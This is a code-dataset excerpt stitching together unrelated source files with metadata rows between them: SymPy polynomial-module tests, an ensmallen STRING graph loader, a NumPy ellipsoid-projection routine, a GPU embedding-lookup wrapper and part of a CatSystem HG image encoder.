assert e*X == [x**2, x**3 + x]
M3 = FreeModule(QQ[x, y], 2)
assert M3.convert(e) == M3.convert([x, x**2 + 1])
assert not M3.is_submodule(0)
assert not M3.is_zero()
raises(NotImplementedError, lambda: ZZ[x].free_module(2))
raises(NotImplementedError, lambda: FreeModulePolyRing(ZZ, 2))
raises(CoercionFailed, lambda: M1.convert(QQ[x].free_module(3).convert([1, 2, 3])))
raises(CoercionFailed, lambda: M3.convert(1))
def test_ModuleOrder():
o1 = ModuleOrder(lex, grlex, False)
o2 = ModuleOrder(ilex, lex, False)
assert o1 == ModuleOrder(lex, grlex, False)
assert (o1 != ModuleOrder(lex, grlex, False)) is False
assert o1 != o2
assert o1((1, 2, 3)) == (1, (5, (2, 3)))
assert o2((1, 2, 3)) == (-1, (2, 3))
def test_SubModulePolyRing_global():
R = QQ[x, y]
F = R.free_module(3)
Fd = F.submodule([1, 0, 0], [1, 2, 0], [1, 2, 3])
M = F.submodule([x**2 + y**2, 1, 0], [x, y, 1])
assert F == Fd
assert Fd == F
assert F != M
assert M != F
assert Fd != M
assert M != Fd
assert Fd == F.submodule(*F.basis())
assert Fd.is_full_module()
assert not M.is_full_module()
assert not Fd.is_zero()
assert not M.is_zero()
assert Fd.submodule().is_zero()
assert M.contains([x**2 + y**2 + x, 1 + y, 1])
assert not M.contains([x**2 + y**2 + x, 1 + y, 2])
assert M.contains([y**2, 1 - x*y, -x])
assert not F.submodule([1 + x, 0, 0]) == F.submodule([1, 0, 0])
assert F.submodule([1, 0, 0], [0, 1, 0]).union(F.submodule([0, 0, 1])) == F
assert not M.is_submodule(0)
m = F.convert([x**2 + y**2, 1, 0])
n = M.convert(m)
assert m.module is F
assert n.module is M
raises(ValueError, lambda: M.submodule([1, 0, 0]))
raises(TypeError, lambda: M.union(1))
raises(ValueError, lambda: M.union(R.free_module(1).submodule([x])))
assert F.submodule([x, x, x]) != F.submodule([x, x, x], order="ilex")
def test_SubModulePolyRing_local():
R = QQ.poly_ring(x, y, order=ilex)
F = R.free_module(3)
Fd = F.submodule([1+x, 0, 0], [1+y, 2+2*y, 0], [1, 2, 3])
M = F.submodule([x**2 + y**2, 1, 0], [x, y, 1])
assert F == Fd
assert Fd == F
assert F != M
assert M != F
assert Fd != M
assert M != Fd
assert Fd == F.submodule(*F.basis())
assert Fd.is_full_module()
assert not M.is_full_module()
assert not Fd.is_zero()
assert not M.is_zero()
assert Fd.submodule().is_zero()
assert M.contains([x**2 + y**2 + x, 1 + y, 1])
assert not M.contains([x**2 + y**2 + x, 1 + y, 2])
assert M.contains([y**2, 1 - x*y, -x])
assert F.submodule([1 + x, 0, 0]) == F.submodule([1, 0, 0])
assert F.submodule([1, 0, 0], [0, 1, 0]).union(F.submodule([0, 0, 1 + x*y])) == F
raises(ValueError, lambda: M.submodule([1, 0, 0]))
def test_SubModulePolyRing_nontriv_global():
R = QQ[x, y, z]
F = R.free_module(1)
def contains(I, f):
return F.submodule(*[[g] for g in I]).contains([f])
assert contains([x, y], x)
assert contains([x, y], x + y)
assert not contains([x, y], 1)
assert not contains([x, y], z)
assert contains([x**2 + y, x**2 + x], x - y)
assert not contains([x+y+z, x*y+x*z+y*z, x*y*z], x**2)
assert contains([x+y+z, x*y+x*z+y*z, x*y*z], x**3)
assert contains([x+y+z, x*y+x*z+y*z, x*y*z], x**4)
assert not contains([x+y+z, x*y+x*z+y*z, x*y*z], x*y**2)
assert contains([x+y+z, x*y+x*z+y*z, x*y*z], x**4 + y**3 + 2*z*y*x)
assert contains([x+y+z, x*y+x*z+y*z, x*y*z], x*y*z)
assert contains([x, 1+x+y, 5-7*y], 1)
assert contains([x**3+y**3, y**3+z**3, z**3+x**3, x**2*y + x**2*z + y**2*z],
x**3)
assert not contains([x**3+y**3, y**3+z**3, z**3+x**3, x**2*y + x**2*z + y**2*z],
x**2 + y**2)
# compare local order
assert not contains([x*(1+x+y), y*(1+z)], x)
assert not contains([x*(1+x+y), y*(1+z)], x + y)
def test_SubModulePolyRing_nontriv_local():
R = QQ.poly_ring(x, y, z, order=ilex)
F = R.free_module(1)
def contains(I, f):
return F.submodule(*[[g] for g in I]).contains([f])
assert contains([x, y], x)
assert contains([x, y], x + y)
assert not contains([x, y], 1)
assert not contains([x, y], z)
assert contains([x**2 + y, x**2 + x], x - y)
assert not contains([x+y+z, x*y+x*z+y*z, x*y*z], x**2)
assert contains([x*(1+x+y), y*(1+z)], x)
assert contains([x*(1+x+y), y*(1+z)], x + y)
def test_syzygy():
R = QQ[x, y, z]
M = R.free_module(1).submodule([x*y], [y*z], [x*z])
S = R.free_module(3).submodule([0, x, -y], [z, -x, 0])
assert M.syzygy_module() == S
M2 = M / ([x*y*z],)
S2 = R.free_module(3).submodule([z, 0, 0], [0, x, 0], [0, 0, y])
assert M2.syzygy_module() == S2
F = R.free_module(3)
assert F.submodule(*F.basis()).syzygy_module() == F.submodule()
R2 = QQ[x, y, z] / [x*y*z]
M3 = R2.free_module(1).submodule([x*y], [y*z], [x*z])
S3 = R2.free_module(3).submodule([z, 0, 0], [0, x, 0], [0, 0, y])
assert M3.syzygy_module() == S3
def test_in_terms_of_generators():
R = QQ.poly_ring(x, order="ilex")
M = R.free_module(2).submodule([2*x, 0], [1, 2])
assert M.in_terms_of_generators([x, x]) == [R.convert(S(1)/4), R.convert(x/2)]
raises(ValueError, lambda: M.in_terms_of_generators([1, 0]))
M = R.free_module(2) / ([x, 0], [1, 1])
SM = M.submodule([1, x])
assert SM.in_terms_of_generators([2, 0]) == [R.convert(-2/(x - 1))]
R = QQ[x, y] / [x**2 - y**2]
M = R.free_module(2)
SM = M.submodule([x, 0], [0, y])
assert SM.in_terms_of_generators([x**2, x**2]) == [R.convert(x), R.convert(y)]
def test_QuotientModuleElement():
R = QQ[x]
F = R.free_module(3)
N = F.submodule([1, x, x**2])
M = F/N
e = M.convert([x**2, 2, 0])
assert M.convert([x+1, x**2+x, x**3+x**2]) == 0
assert e == [x**2, 2, 0] + N == F.convert([x**2, 2, 0]) + N == \
M.convert(F.convert([x**2, 2, 0]))
assert M.convert([x**2 + 1, 2*x + 2, x**2]) == e + [0, x, 0] == \
e + M.convert([0, x, 0]) == e + F.convert([0, x, 0])
assert M.convert([x**2 + 1, 2, x**2]) == e - [0, x, 0] == \
e - M.convert([0, x, 0]) == e - F.convert([0, x, 0])
assert M.convert([0, 2, 0]) == M.convert([x**2, 4, 0]) - e == \
[x**2, 4, 0] - e == F.convert([x**2, 4, 0]) - e
assert M.convert([x**3 + x**2, 2*x + 2, 0]) == (1 + x)*e == \
R.convert(1 + x)*e == e*(1 + x) == e*R.convert(1 + x)
assert -e == [-x**2, -2, 0]
f = [x, x, 0] + N
assert M.convert([1, 1, 0]) == f / x == f / R.convert(x)
M2 = F/[(2, 2*x, 2*x**2), (0, 0, 1)]
G = R.free_module(2)
M3 = G/[[1, x]]
M4 = F.submodule([1, x, x**2], [1, 0, 0]) / N
raises(CoercionFailed, lambda: M.convert(G.convert([1, x])))
raises(CoercionFailed, lambda: M.convert(M3.convert([1, x])))
raises(CoercionFailed, lambda: M.convert(M2.convert([1, x, x])))
assert M2.convert(M.convert([2, x, x**2])) == [2, x, 0]
assert M.convert(M4.convert([2, 0, 0])) == [2, 0, 0]
def test_QuotientModule():
R = QQ[x]
F = R.free_module(3)
N = F.submodule([1, x, x**2])
M = F/N
assert M != F
assert M != N
assert M == F / [(1, x, x**2)]
assert not M.is_zero()
assert (F / F.basis()).is_zero()
SQ = F.submodule([1, x, x**2], [2, 0, 0]) / N
assert SQ == M.submodule([2, x, x**2])
assert SQ != M.submodule([2, 1, 0])
assert SQ != M
assert M.is_submodule(SQ)
assert not SQ.is_full_module()
raises(ValueError, lambda: N/F)
raises(ValueError, lambda: F.submodule([2, 0, 0]) / N)
raises(ValueError, lambda: R.free_module(2)/F)
raises(CoercionFailed, lambda: F.convert(M.convert([1, x, x**2])))
M1 = F / [[1, 1, 1]]
M2 = M1.submodule([1, 0, 0], [0, 1, 0])
assert M1 == M2
def test_ModulesQuotientRing():
R = QQ.poly_ring(x, y, order=(("lex", x), ("ilex", y))) / [x**2 + 1]
M1 = R.free_module(2)
assert M1 == R.free_module(2)
assert M1 != QQ[x].free_module(2)
assert M1 != R.free_module(3)
assert [x, 1] in M1
assert [x] not in M1
assert [1/(R.convert(x) + 1), 2] in M1
assert [1, 2/(1 + y)] in M1
assert [1, 2/y] not in M1
assert M1.convert([x**2, y]) == [-1, y]
F = R.free_module(3)
Fd = F.submodule([x**2, 0, 0], [1, 2, 0], [1, 2, 3])
M = F.submodule([x**2 + y**2, 1, 0], [x, y, 1])
assert F == Fd
assert Fd == F
assert F != M
assert M != F
assert Fd != M
assert M != Fd
assert Fd == F.submodule(*F.basis())
assert Fd.is_full_module()
assert not M.is_full_module()
assert not Fd.is_zero()
assert not M.is_zero()
assert Fd.submodule().is_zero()
assert M.contains([x**2 + y**2 + x, -x**2 + y, 1])
assert not M.contains([x**2 + y**2 + x, 1 + y, 2])
assert M.contains([y**2, 1 - x*y, -x])
assert F.submodule([x, 0, 0]) == F.submodule([1, 0, 0])
assert not F.submodule([y, 0, 0]) == F.submodule([1, 0, 0])
assert F.submodule([1, 0, 0], [0, 1, 0]).union(F.submodule([0, 0, 1])) == F
assert not M.is_submodule(0)
def test_module_mul():
R = QQ[x]
M = R.free_module(2)
S1 = M.submodule([x, 0], [0, x])
S2 = M.submodule([x**2, 0], [0, x**2])
I = R.ideal(x)
assert I*M == M*I == S1 == x*M == M*x
assert I*S1 == S2 == x*S1
def test_intersection():
# SCA, example 2.8.5
F = QQ[x, y].free_module(2)
M1 = F.submodule([x, y], [y, 1])
M2 = F.submodule([0, y - 1], [x, 1], [y, x])
I = F.submodule([x, y], [y**2 - y, y - 1], [x*y + y, x + 1])
I1, rel1, rel2 = M1.intersect(M2, relations=True)
assert I1 == M2.intersect(M1) == I
for i, g in enumerate(I1.gens):
assert g == sum(c*x for c, x in zip(rel1[i], M1.gens)) \
== sum(d*y for d, y in zip(rel2[i], M2.gens))
assert F.submodule([x, y]).intersect(F.submodule([y, x])).is_zero()
def test_quotient():
# SCA, example 2.8.6
R = QQ[x, y, z]
F = R.free_module(2)
assert F.submodule([x*y, x*z], [y*z, x*y]).module_quotient(
F.submodule([y,z], [z,y])) == QQ[x, y, z].ideal(x**2*y**2 - x*y*z**2)
assert F.submodule([x, y]).module_quotient(F.submodule()).is_whole_ring()
M = F.submodule([x**2, x**2], [y**2, y**2])
N = F.submodule([x + y, x + y])
q, rel = M.module_quotient(N, relations=True)
assert q == R.ideal(y**2, x - y)
for i, g in enumerate(q.gens):
assert g*N.gens[0] == sum(c*x for c, x in zip(rel[i], M.gens))
def test_groebner_extendend():
M = QQ[x,y,z].free_module(3).submodule([x + 1, y, 1], [x*y, z, z**2])
G, R = M._groebner_vec(extended=True)
for i, g in enumerate(G):
assert g == sum(c*gen for c, gen in zip(R[i], M.gens))
| 33.735065
| 87
| 0.524638
|
4a0a2cfafed92c013911ba72b75b9b38b1ff878e
| 3,588
|
py
|
Python
|
bindings/python/ensmallen/datasets/string/candidatusmycoplasmahaemolamaestrpurdue.py
|
AnacletoLAB/ensmallen_graph
|
b2c1b18fb1e5801712852bcc239f239e03076f09
|
[
"MIT"
] | 5
|
2021-02-17T00:44:45.000Z
|
2021-08-09T16:41:47.000Z
|
bindings/python/ensmallen/datasets/string/candidatusmycoplasmahaemolamaestrpurdue.py
|
AnacletoLAB/ensmallen_graph
|
b2c1b18fb1e5801712852bcc239f239e03076f09
|
[
"MIT"
] | 18
|
2021-01-07T16:47:39.000Z
|
2021-08-12T21:51:32.000Z
|
bindings/python/ensmallen/datasets/string/candidatusmycoplasmahaemolamaestrpurdue.py
|
AnacletoLAB/ensmallen
|
b2c1b18fb1e5801712852bcc239f239e03076f09
|
[
"MIT"
] | 3
|
2021-01-14T02:20:59.000Z
|
2021-08-04T19:09:52.000Z
|
"""
This file offers the methods to automatically retrieve the graph Candidatus Mycoplasma haemolamae str. Purdue.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def CandidatusMycoplasmaHaemolamaeStrPurdue(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Candidatus Mycoplasma haemolamae str. Purdue graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Wether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
Wether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instace of Candidatus Mycoplasma haemolamae str. Purdue graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="CandidatusMycoplasmaHaemolamaeStrPurdue",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
| 34.171429
| 223
| 0.684783
|
4a0a2d0e65bb321ca557a7f9a4d2f11161733931
| 5,347
|
py
|
Python
|
utils/ell_proj_np.py
|
StanfordASL/UP
|
1677960690cc1a7576d62639333decb31b730707
|
[
"MIT"
] | 6
|
2021-01-08T05:44:52.000Z
|
2021-12-12T06:39:14.000Z
|
utils/ell_proj_np.py
|
StanfordASL/UP
|
1677960690cc1a7576d62639333decb31b730707
|
[
"MIT"
] | null | null | null |
utils/ell_proj_np.py
|
StanfordASL/UP
|
1677960690cc1a7576d62639333decb31b730707
|
[
"MIT"
] | 1
|
2021-03-19T15:47:23.000Z
|
2021-03-19T15:47:23.000Z
|
##
## Code written by Robert Dyro, Stanford ASL, 2020
##
## Reproduces the Self-adaptive Alternating Direction Method of Multipliers (S-ADMM) as described in
## Z. Jia, X. Cai, and D. Han. Comparison of several fast algorithms for projection onto anellipsoid.
## Journal of Computational and Applied Mathematics, 319(1):320–337, 2017.
##^# utils and imports #########################################################
import time
# ------------
import numpy as np, scipy.linalg as LA, math
_bmv = lambda A, x: (A @ x[..., None])[..., 0]
##$#############################################################################
##^# numpy implementation ######################################################
def _fsolve_fn(A, x, lower=True):
assert A.ndim == 3
return np.stack([LA.cho_solve((A[i], lower), x[i]) for i in
range(A.shape[0])])
def _proj_l2(F, A, AT, z, v, rho):
return _fsolve_fn(F, z + rho[..., None] * _bmv(AT, v))
def _proj_uball(v):
return v / np.maximum(np.linalg.norm(v, axis=-1), 1.0)[..., None]
def proj_ell(Q, z, rho=None, max_it=10**2, eps=None, x_guess=None,
verbose=False):
"""
Projects points z such that they lie within the ellipsoid, i.e.,
z.T @ Q @ z <= 1
Inputs: Q : ellipsoidal shape matrices - (B, n_z, n_z)
z : points to project - (B, n_z)
Outputs: new_z : projected points - (B, n_z)
"""
bshape = Q.shape[:-2]
Q, z = Q.reshape((-1,) + Q.shape[-2:]), z.reshape((-1, z.shape[-1]))
if rho is None:
rho = Q.shape[-1] / np.sqrt(np.linalg.norm(Q, axis=(-2, -1)))
else:
rho = rho * np.ones(Q.shape[0])
eps = eps if eps is not None else 1e-7
A = np.stack([LA.cholesky(Q[i], lower=False) for i in range(Q.shape[0])])
AT = A.swapaxes(-2, -1)
P = np.eye(Q.shape[-1]) + rho[..., None, None] * Q
F = np.stack([LA.cholesky(P[i], lower=True) for i in range(P.shape[0])])
x = x_guess if x_guess is not None else z
y = _fsolve_fn(A, x, lower=False)
u = np.zeros(z.shape)
x_prev, it = x, 0
r_prim, r_dual = np.array(float("inf")), np.array(float("inf"))
while it < max_it and (r_prim.mean() > eps or r_dual.mean() > eps):
x = _proj_l2(F, A, AT, z, y - u, rho=rho)
Ax = _bmv(A, x)
y = _proj_uball(Ax + u)
u = u + (Ax - y)
r_prim = np.linalg.norm(Ax - y, axis=-1) / math.sqrt(A.shape[-1])
r_dual = np.linalg.norm(x - x_prev, axis=-1) / math.sqrt(A.shape[-1])
x_prev, it = x, it + 1
# print(it)
if verbose:
data = dict(it=it, r_prim=r_prim, r_dual=r_dual)
data["norms"] = np.sum(x * _bmv(Q, x), -1)
if it == max_it and (r_prim.mean() > eps or r_dual.mean() > eps):
print("Ellipsoid projection did not converge")
# print("The solution norms in the ellipse norm are:")
# print(data["norms"])
return x.reshape(bshape + (x.shape[-1],)), data
else:
return x.reshape(bshape + (x.shape[-1],))
##$#############################################################################
##^# testing routines ##########################################################
def check(Q, z):
import cvxpy as cp
assert z.ndim == 1
x_var = cp.Variable(z.shape)
obj, cstr = cp.sum_squares(x_var - z), [cp.quad_form(x_var, Q) <= 1.0]
prob = cp.Problem(cp.Minimize(obj), cstr)
prob.solve(cp.ECOS, verbose=False)
assert prob.status == "optimal"
return x_var.value.reshape(-1)
def sample():
n = 10**1
N = 10
A = np.random.randn(*(N, N, n, n))
A[:N//2, :, :] *= 1e-3
A[N//2:, :, :] *= 1e6
Q = A @ A.swapaxes(-2, -1) / 2 + np.eye(A.shape[-1]) * 1e-1
z = np.random.randn(*(N, N, n)) * 1e9
return Q, z
def sample_2():
n = 32
N = 100
A = np.random.randn(*(N, n, n))
A[:N//2, :, :] *= 1e-3
# A[N//2:, :, :] *= 1e6
Q = A @ A.swapaxes(-2, -1) / 2 + np.eye(A.shape[-1]) * 1e-1
z = np.random.randn(*(N, n)) *0.1#* 1e9
return Q, z
def main(Q, z):
#A = np.random.randn(*(3, 3))
#Q = A @ A.T / 2
#z = np.random.randn(3) * 10
#x1 = check(Q, z)
#print(x1)
#print("norm =", np.sum(x1 * _bmv(Q, x1)))
#x2 = proj_ell(Q, z, rho=1e0)
#print(x2)
# Naive method
x_naive = (z.T/np.sum(z * _bmv(Q, z), -1)).T
print("proj_dists naive =", np.linalg.norm(x_naive-z))
#import matplotlib.pyplot as plt
#rho_exps = range(-6, 4)
#its = [proj_ell(Q, z, verbose=True, rho=10**float(rho_exp))[1]["it"]
# for rho_exp in rho_exps]
#plt.figure()
#plt.plot(rho_exps, its)
#plt.show()
max_it = 200
print('Norms before = ', np.sum(z * _bmv(Q, z), -1))
print('Q=',Q.shape)
print('z=',z.shape)
x2, data = proj_ell(Q, z, verbose=True, eps=1e-5, max_it=max_it)
print("norm =", data["norms"])
print("it =", data["it"])
# print("r_prim =", data["r_prim"])
# print("r_dual =", data["r_dual"])
print(x2.shape)
print("proj_dists=", np.linalg.norm(x2-z))
# Q, z = sample()
Q, z = sample_2()
if __name__ == "__main__":
# main(Q, z)
start = time.time()
main(Q, z)
end = time.time()
print("\n\nelapsed time = ",end-start,"\n\n")
##$#############################################################################
| 34.496774
| 106
| 0.501403
|
4a0a2d4420d2cbbcba0049caf1aaacb8c886f95b
| 870
|
py
|
Python
|
python/athena/gpu_links/EmbeddingLookUpLink.py
|
DMALab/TSplit
|
8f86f987163aa06521bfeeb174616eb4a0a81b47
|
[
"Apache-2.0"
] | 2
|
2021-05-29T11:18:14.000Z
|
2021-09-09T14:29:21.000Z
|
python/athena/gpu_links/EmbeddingLookUpLink.py
|
DMALab/TSplit
|
8f86f987163aa06521bfeeb174616eb4a0a81b47
|
[
"Apache-2.0"
] | null | null | null |
python/athena/gpu_links/EmbeddingLookUpLink.py
|
DMALab/TSplit
|
8f86f987163aa06521bfeeb174616eb4a0a81b47
|
[
"Apache-2.0"
] | 1
|
2021-05-01T16:34:37.000Z
|
2021-05-01T16:34:37.000Z
|
from __future__ import absolute_import
import ctypes
from .._base import _LIB
from .. import ndarray as _nd
def embedding_lookup(in_mat, ids, out_mat, stream = None, profiler = None):
assert isinstance(in_mat, _nd.NDArray)
assert isinstance(ids, _nd.NDArray)
assert isinstance(out_mat, _nd.NDArray)
_LIB.DLGpuEmbeddingLookUp(
in_mat.handle, ids.handle, out_mat.handle, stream.handle if stream else None, ctypes.byref(profiler) if profiler else None)
def embedding_lookup_gradient(grad_out, ids, grad_in, stream = None, profiler = None):
assert isinstance(grad_out, _nd.NDArray)
assert isinstance(ids, _nd.NDArray)
assert isinstance(grad_in, _nd.NDArray)
_LIB.DLGpuEmbeddingLookUp_Gradient(
grad_out.handle, ids.handle, grad_in.handle, stream.handle if stream else None, ctypes.byref(profiler) if profiler else None)
| 41.428571
| 134
| 0.758621
|
4a0a2dddfb1969c976a03f1d256ecc78ae8af792
| 54,966
|
py
|
Python
|
src/catsys/imgs/hgencoder.py
|
AtomCrafty/catsystem-py
|
11bd96708e3959be84e41e30397820ebaa54974d
|
[
"MIT"
] | 6
|
2020-10-20T13:26:56.000Z
|
2022-02-15T05:26:38.000Z
|
src/catsys/imgs/hgencoder.py
|
AtomCrafty/catsystem-py
|
11bd96708e3959be84e41e30397820ebaa54974d
|
[
"MIT"
] | 2
|
2020-10-20T16:15:35.000Z
|
2021-07-08T18:15:23.000Z
|
src/catsys/imgs/hgencoder.py
|
AtomCrafty/catsystem-py
|
11bd96708e3959be84e41e30397820ebaa54974d
|
[
"MIT"
] | 1
|
2020-10-19T15:20:50.000Z
|
2020-10-19T15:20:50.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""HG image encoding utility
Provides the encoding and decoding methods for HG image encodings (HG-2, HG-3).
"""
__version__ = '1.0.0'
__date__ = '2020-09-19'
__author__ = 'Robert Jordan'
__all__ = []
#######################################################################################
import io, os, struct, zlib
import enum, collections # for type declarations only
from typing import Iterable, Iterator, List, Optional, NoReturn, Tuple, Type, Union # for hinting in declarations
# local imports
from ._baseimg import ImageContainer, ImageFrame
## PREDECLARE TYPES ##
HgSlice = collections.namedtuple('HgSlice', ('index', 'length')) #, 'data', 'cmd'))
HgData = collections.namedtuple('HgData', ('data', 'cmd'))
Point = collections.namedtuple('Point', ('x, y'))
Size = collections.namedtuple('Size', ('width', 'height'))
Rect = collections.namedtuple('Rect', ('x', 'y', 'width', 'height'))
#FORMAT: in byte-order (little endian)
#24bit = BGR
#32bit = BGRA
Color = collections.namedtuple('Color', ('r', 'g', 'b', 'a'))
def get_color(color:Union[int, Tuple[int,int,int], Tuple[int,int,int,int]]) -> Color:
if not isinstance(color, int):
if len(color) == 3:
return Color(*color[0], 0xff)
return Color(*color)
return Color((color >> 16) & 0xff, (color >> 8) & 0xff, color & 0xff, (color >> 24) & 0xff)
class HgAttribute(object):
__slots__ = ('x', 'y', 'width', 'height', 'rawcolor')
#
def __init__(self, x:int, y:int, width:int, height:int, color:Union[int, Color]):
self.x = x
self.y = y
self.width = width
self.height = height
if not isinstance(color, int):
if len(color) == 3:
color = Color(*color[0], 0xff)
else:
color = Color(*color)
else:
color = Color((color >> 16) & 0xff, (color >> 8) & 0xff, color & 0xff, (color >> 24) & 0xff)
self.color = color
#
@property
def point(self) -> Point: return Point(self.x, self.y)
@point.setter
def point(self, point:Size): self.x, self.y = point
#
#
@property
def size(self) -> Size: return Size(self.width, self.height)
@size.setter
def size(self, size:Size): self.width, self.height = size
#
@property
def rawcolor(self) -> int:
return ((self.color[0] << 16) | (self.color[1] << 8) |
(self.color[2] ) | (self.color[3] << 24))
@rawcolor.setter
def rawcolor(self, rawcolor):
self.color = Color(
(rawcolor >> 16) & 0xff, (rawcolor >> 8) & 0xff,
(rawcolor ) & 0xff, (rawcolor >> 24) & 0xff)
class StandardInfo(object):
__slots__ = ('width', 'height', 'bpp', 'offsetx', 'offsety', 'fullwidth', 'fullheight', 'transparent', 'originx', 'originy')
#
def __init__(self, width:int=0, height:int=0, bpp:int=0, offsetx:int=0, offsety:int=0, fullwidth:int=0, fullheight:int=0, transparent:bool=False, originx:int=0, originy:int=0):
self.width = 0
self.height = 0
self.bpp = 0 # pixel bit depth (bits per pixel)
self.bpc = 0 # channel bit depth (bits per channel) 0 => 8
self.canvasx = 0
self.canvasy = 0
self.canvaswidth = 0
self.canvasheight = 0
self.transparent = False
self.originx = 0
self.originy = 0
@property
def size(self) -> Size: return Size(self.width, self.height)
@size.setter
def size(self, size:Size): self.width, self.height = size
#
@property
def canvas(self) -> Rect: return Rect(self.canvasx, self.canvasy, self.canvaswidth, self.canvasheight)
@canvas.setter
def canvas(self, canvasrect:Rect): self.canvasx, self.canvasy, self.canvaswidth, self.canvasheight = canvasrect
#
@property
def canvassize(self) -> Size: return Size(self.canvaswidth, self.canvasheight)
@canvassize.setter
def canvassize(self, canvassize:Size): self.canvaswidth, self.canvasheight = canvassize
#
@property
def canvaspos(self) -> Point: return Point(self.canvasx, self.canvasy)
@canvaspos.setter
def canvaspos(self, canvaspos:Point): self.canvasx, self.canvasy = canvaspos
#
@property
def origin(self) -> Point: return Point(self.originx, self.originy)
@origin.setter
def origin(self, origin:Point): self.originx, self.originy = origin
#
@property
def bytedepth(self) -> int: return (self.bpp + 7) // 8
# @bytedepth.setter
# def bytedepth(self, bytedepth:int): self.bpp = bytedepth * 8
@property
def stride(self) -> int: return (self.width * self.bpp + 7) // 8
@property
def buffersize(self) -> int: return (self.stride * self.height)
@property
def hasalpha(self) -> bool: return self.bpp == 32
#
@property
def depthmax(self) -> int:
return (((1 << self.depth ** 2) - 1) & 0xff) if self.depth else 0xff
class StandardInfo(object):
"""StandardInfo(**kwargs) -> stdinfo with assigned kwargs
"""
__slots__ = ('size', 'bpp', 'depth', 'canvassize', 'canvaspos', 'transparent', 'origin')
def __init__(self, **kwargs):
self.size = Size(0, 0)
self.canvassize = Size(0, 0)
self.canvaspos = Point(0, 0)
self.origin = Point(0, 0)
self.transpareny = False
self.bpp = 0 # 24 or 32 required
self.bpc = 0 # only used in HG-2, (see source of info)
#<https://github.com/morkt/GARbro/blob/c5e13f6db1d24a62eb621c38c6fc31387338d857/ArcFormats/CatSystem/ImageHG2.cs#L117-L126>
for key,val in kwargs.items():
setattr(self, key, val)
#
#ATTRIBUTE PROPERTIES:
#
@property
def width(self) -> int: return self.size[0]
@width.setter
def width(self, width): self.size = Size(width, self.size[1])
@property
def height(self) -> int: return self.size[1]
@height.setter
def height(self, height): self.size = Size(self.size[0], height)
#
@property
def canvaswidth(self) -> int: return self.canvassize[0]
@canvaswidth.setter
def canvaswidth(self, canvaswidth): self.canvassize = Size(canvaswidth, self.canvassize[1])
@property
def canvasheight(self) -> int: return self.canvassize[1]
@canvasheight.setter
def canvasheight(self, canvasheight): self.canvassize = Size(self.canvassize[0], canvasheight)
#
@property
def canvasx(self) -> int: return self.canvaspos[0]
@canvasx.setter
def canvasx(self, canvasx): self.canvaspos = Point(canvasx, self.canvaspos[1])
@property
def canvasy(self) -> int: return self.canvaspos[1]
@canvasy.setter
def canvasy(self, canvasy): self.canvaspos = Point(self.canvaspos[0], canvasy)
#
@property
def originx(self) -> int: return self.origin[0]
@originx.setter
def originx(self, originx): self.origin = Point(originx, self.origin[1])
@property
def originy(self) -> int: return self.origin[1]
@originy.setter
def originy(self, originy): self.origin = Point(self.origin[0], originy)
#
#CALCULATED PROPERTIES:
#
@property
def bytedepth(self) -> int: return (self.bpp + 7) // 8
@bytedepth.setter
def bytedepth(self, bytedepth): self.bpp = bytedepth * 8
#
#
#ALIAS PROPERTIES
#
@property
def bitdepth(self) -> int: return self.bpp
@bitdepth.setter
def bitdepth(self, bitdepth): self.bpp = bitdepth
#
@property
def channeldepth(self) -> int: return self.bpc
@channeldepth.setter
def channeldepth(self, channeldepth): self.bpc = channeldepth
@property
def channelmax(self) -> int:
return ((2**self.bpc - 1) & 0xff) if self.bpc else 0xff # bitmask for number of bits
# @bytedepth.setter
# def bytedepth(self, bytedepth:int):
# self.bpp = bytedepth * 8
#
@property
def stride(self) -> int: return (self.width * self.bpp + 7) // 8
#
@property
def buffersize(self) -> int: return (self.stride * self.height)
#
@property
def offsetstride(self) -> int: return (self.canvasx * self.bpp + 7) // 8
#
@property
def canvasstride(self) -> int: return (self.canvaswidth * self.bpp + 7) // 8
@property
def canvasbuffersize(self) -> int: return (self.canvasstride * self.canvasheight)
#
@property
def hasalpha(self) -> bool: return self.bpp == 32
# [Flags]
# public enum HgxOptions {
# None = 0,
# Flip = (1 << 0), // Flip vertically (applied after crop when encoding)
# Crop = (1 << 2), // Expand or Shrink
# }
class HgOptions(enum.IntFlag):
"""FLIP: vertically flip the image
CROP: expand or shrink the image around transparent area
"""
#NONE = 0 # no options
FLIP = (1 << 0) # vertical flip
CROP = (1 << 1) # shrink/expand canvas size around transparency
